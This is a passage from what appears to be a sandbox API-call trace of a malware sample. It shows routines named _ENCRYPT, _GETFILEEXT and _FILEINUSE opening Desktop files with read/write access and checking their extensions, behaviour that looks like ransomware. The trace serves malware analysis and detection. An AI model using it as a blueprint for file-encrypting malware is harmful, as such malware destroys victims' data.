SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x224, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.999] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.999] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.999] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.999] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.999] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.999] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0029.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.999] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.999] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.000] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.000] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8891d8 [0030.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8891d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.000] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jacksparrow.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.001] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.001] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.001] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0030.001] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.001] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.001] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.001] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.001] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.001] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.001] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c7a8 [0030.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c7a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.002] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kTcOKA 7x2tvUoVBP6.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ktcoka 7x2tvuovbp6.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.002] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.002] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.002] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.002] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.002] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0030.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.003] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.003] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.003] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.003] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.003] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0030.003] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.003] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.004] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.004] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.004] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.004] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kTcOKA 7x2tvUoVBP6.mp4", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2567f450, ftCreationTime.dwHighDateTime=0x1d5c2d5, ftLastAccessTime.dwLowDateTime=0x79b8e770, ftLastAccessTime.dwHighDateTime=0x1d5c0f1, ftLastWriteTime.dwLowDateTime=0x79b8e770, ftLastWriteTime.dwHighDateTime=0x1d5c0f1, nFileSizeHigh=0x0, nFileSizeLow=0x93d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="kTcOKA 7x2tvUoVBP6.mp4", cAlternateFileName="KTCOKA~1.MP4")) returned 0x7c20c0 [0030.004] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.005] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kTcOKA 7x2tvUoVBP6.mp4", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2567f450, ftCreationTime.dwHighDateTime=0x1d5c2d5, ftLastAccessTime.dwLowDateTime=0x79b8e770, ftLastAccessTime.dwHighDateTime=0x1d5c0f1, ftLastWriteTime.dwLowDateTime=0x79b8e770, ftLastWriteTime.dwHighDateTime=0x1d5c0f1, nFileSizeHigh=0x0, nFileSizeLow=0x93d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="kTcOKA 7x2tvUoVBP6.mp4", cAlternateFileName="KTCOKA~1.MP4")) returned 0x7c20c0 [0030.006] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.006] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0030.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0030.007] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.007] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: 